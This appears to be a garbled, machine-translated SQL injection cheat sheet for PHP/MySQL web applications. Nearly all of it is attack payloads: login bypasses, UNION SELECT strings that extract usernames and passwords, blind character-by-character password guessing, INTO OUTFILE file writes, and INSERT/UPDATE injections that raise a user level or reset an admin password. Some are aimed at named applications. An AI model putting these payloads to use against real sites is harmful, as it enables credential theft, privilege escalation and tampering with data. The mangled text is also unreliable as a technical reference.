PHP injection
'or 1 = 1' or '1 = 1' / * '% 23' and password = 'mypass id = -1 union select 1, 1, 1 id = -1 Union Select Char (97), CHAR (97), Char (97) ID = 1 Union Select 1, 1, 1 from members ID = 1 Union SELECT 1, 1, 1 from admin ID = 1 Union Select 1, 1, 1 from user userid = 1 and password = mypass userid = 1 And MID (Password, 3, 1) = char (112) Userid = 1 and MID (Password, 4, 1) = char (97) And ORD (MID (Password, 3, 1))> 111 (ORD function is very good Use, can return to shaping) 'and length (password) =' 6 (detection password length) 'and left (password, 1) =' m 'and left (password, 2) =' my ..................... ......... IPT 1, USERNAME, Password from user / * 'union select 1, username, password from user / * =' Union Select 1, username, password from user / * (can be 1 or = directly And) 99999 'Union Select 1, Username, Password from user / *' inTo outfile 'c: /file.txt (export file) =' or 1 = 1 INTO OUTFILE 'C: /FILE.TXT 1' Union Select 1, Username, Password from User Into Outfile 'C: /User.txt SELECT Password from Admin SERE Login =' John 'Into Dumpfile' /Path/to/site/file.txt 'id =' union Select 1, username, Password from User INTO OUTFILE ID = -1 Union Select 1, Database (), Version () (flexible application query) Common query test statement, select * from table where 1 = 1 Select * from table where 'uuu' = 'uuu' selection * from table where 1 <> 2 Select * From Table WHERE 3> 2 Select * from table where 2 <3 Select * from table where 1 select * from table where 1
1 Select * from table where ille1 From table where 2 between 1 and 3 select * from table where 'b' between 'a' and 'c' Select * from table where 2 in (0, 1, 2) SELECT * from Table WHERE Case WHEN 1> 0 THEN 1 END, for example: Night Cat Download System 1.0 version ID = 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from YMDown_USER UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 ID = 10000 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 and groupid = 1 Union Select 1, Username, 1, Password, 1 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 (replace, looking for a password) Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 and ORD (MID (Password, 1, 1)) = 49 ( Verify the first password) Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 and ORD (MID (PASSWORD, 2, 1)) = 50 (second) Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1 and ORD (MID (Password, 3, 1)) = 51 ..............................................................
For example 2: Gray Track Transform ID Test (Meteor) Union% 20 (Select% 20allowsMilies, public, userid, '0000-0-0', user (), version ()% 20FROM% 20calendar_events% 20where% 20EventID% 20 = % 2013)% 20RDER% 20BY% 20EventDate Union% 20 (Select% 20allowsmilies, public, userid, '0000-0-0', pass (), version ()% 20FROM% 20Calendar_Events% 20where% 20eventid% 20 =% 2010) % 20ORDER% 20by% 20eventDate constructor: Select Allowsmilies, Public, Userid, EventDate, Event, Subject from calendar_events where eventid = 1 Union (SELECT 1, 1, 1, 1, 1, 1 from user where userid = 1) Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, UserId = 1) Union% 20 (SELECT% 201, 0, 2 , '1999-01-01', 'a', password% 20FROM% 20User% 20where% 20Userid% 20 =% 205)% 20ORDER% 20BY% 20EventDate Union% 20 (select% 201, 0, 12695, '1999-01 -01 ',' a ', password% 20FROM% 20User% 20where% 20Userid = 13465)% 20RDER% 20BY% 20eventdate Union% 20 (Select% 201, 0, 12695,' 1999-01-01 ',' A ', Userid% 20FROM% 20User% 20where% 20USERNAME = 'sandflee')% 20ORDER% 20BY% 20eventdat e (SAS ID) (Select a from table_name where a = 10 and b = 1 Order by a limit 10) Select * from article where articleid = '$ ID' Union Select * from ... (field and database in the same case , Can be submitted directly) Select * from article where articleid = '$ ID' Union SELECT 1, 1, 1, 1, 1, 1, 1 from ... (in different cases)
Special skill: in the form, search engine, etc. Write: "___" "" .__ ""%% 'Order by ArticleID / *%' Order by ArticleID # __ 'Order by ArticleID / * __' Order by ArticleID #
$ comMMAND = "DIR C: /"; System ($ command); select * from article where articleid = '$ ID' SELECT * from article where article = $ ID 1 'and 1 = 2 Union Select * from user where userid = 1 / * sentence change to (Select * from article where articleid = '1' and 1 = 2 Union Select * from user where userid = 1 / * ') 1 and 1 = 2 Union Select * from user where userid = 1 statement Form: Create a library, insert: create database...`. userid` int (11) Not null auto_increment, `Username` Varchar (20) Not null default ',` Password` VARCHAR (20) NOT NULL Default ', Primary Key (`Userid`) Insert Into` User` VALUES (1,' Swap ',' mypass);
Insert, for a registered user: INSERT INTO `USER` (UserId, Userlevel) Values ('', '$ usrname",' $ password ',' $ homepage ',' 1 '); "Insert Into MEMBRES (Login, Password, Nom, Email, Userlevel) Values ('$ login', '$ Pass', '$ NOM', '$ Email', '1') "; Insert Into Membres (Login, Password, NOM, Email, userlevel) Values ('', ',' ',' ',' 3 ') #', '1') "INSERT INTO MEMBRES SET login = '$ login', password = '$ pass', NOM = '$ NOM', Email = '$ Email'; Insert Into Membres Set Login = ', Password =' ', NOM =', Userlevel = '3', Email = '' "INTO MEMBRES VALUES ('$ ID ',' $ login ',' $ Pass', '$ NOM', '$ Email', '1')
Update user set password = '$ password', homepage = '$ homepage' where id = '$ ID' update user set password = 'md5 (mypass)' where username = 'admin' #) ', homepage =' $ homepage ' WHERE ID = '$ ID' "Update MEMBRES SET Password = '$ Pass', NOM = '$ NOM', Email = '$ Email' Where ID = '$ ID'"; UPDATE MEMBRES SET Password = '[Pass]' , NOM = ', userlevel =' 3 ', email =' 'where id =' [id] '"Update News set votes = votes 1, score = score $ note where id/ =' $ ID '"; long Function: Database () user () system_user () session_user () current_user () such as: Update Article Set title = $ title where articles = 1 Corresponding function update article set title = Database () where id = 1 # Turn the current database name update To title field Update Article Set = USER () Where id = 1 # Update the current MySQL username to title field Update Article Set title = system_user () where id = 1 # Update the current MySQL username to Title field Update Article Set Title = session_user () where id = 1 # Update the current MySQL username to title field Update Article Set title = current_user () where id = 1 # Update the current session authenticated username to Title field
